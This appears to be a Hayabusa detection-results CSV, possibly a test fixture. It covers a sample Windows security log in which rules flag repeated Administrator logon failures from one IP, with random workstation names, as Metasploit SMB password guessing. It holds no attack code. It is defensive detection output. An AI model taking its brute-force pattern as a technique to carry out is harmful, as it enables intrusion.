+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyRifC46GrNpTA4x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvNaby30vAT9drAX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wkYSOQ2bD51a4U8l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rqdOquL9Ax01RPPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nqCCiK5arcyRHha6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpyTGZLkAb0w0kgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wa2pXrZKxeZZYKAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dK0N5KeBgCze1YWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g4dHlwZjMzI5wU2s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GzF2ouP5KkRfsxnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSQxMrGlDiAOo6ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gL0rz3p1yG6RhfAT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyChoTSKgJeK6yqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG4I11dwpBM9SM3l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7foAZ5Y1igCbHap  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ATDXUljQwg8WvUVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdmXaJqQMAG2g6Ao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bjame5puT5CDeoIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0FGGVVkckmdURVh6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j0Smqw4cA4wG2Q6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLWloOhUYEQlj6y6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Tuxuykh0j5afeTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeXS6QwYhqJAOeuz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AqFSJCq5bmBW6dj1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DH1zyt1hxTgzajhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rrZxcWjUX4OgYYIb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ExtkYXSJI8F41uvw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sLh1Q3RieOoukiCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kNb2hZDxi4QrbQpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCb1TMlFj2PjH2sA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rgF42C57Nx6F3HU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KZfFH9geIrxVYowJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWz1XeyxywR0o5gS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: og1kItEC6WhqXF37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0KhaJlD6tWwF2ky  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUy0EKmjyD6ZYENA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h3MdGstPPFJDGzwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTs0ZQa6LGrKZKsY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FefzWjMXSvMdvqcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnUt9tPRSXR5mWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dehb4M6pcxi56Bkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tLXHvGiUqZyxax4W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP1gKcf1eeKm0RB1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldbN1odP77n0BOzO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: drRC8qCbPe5e4mdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
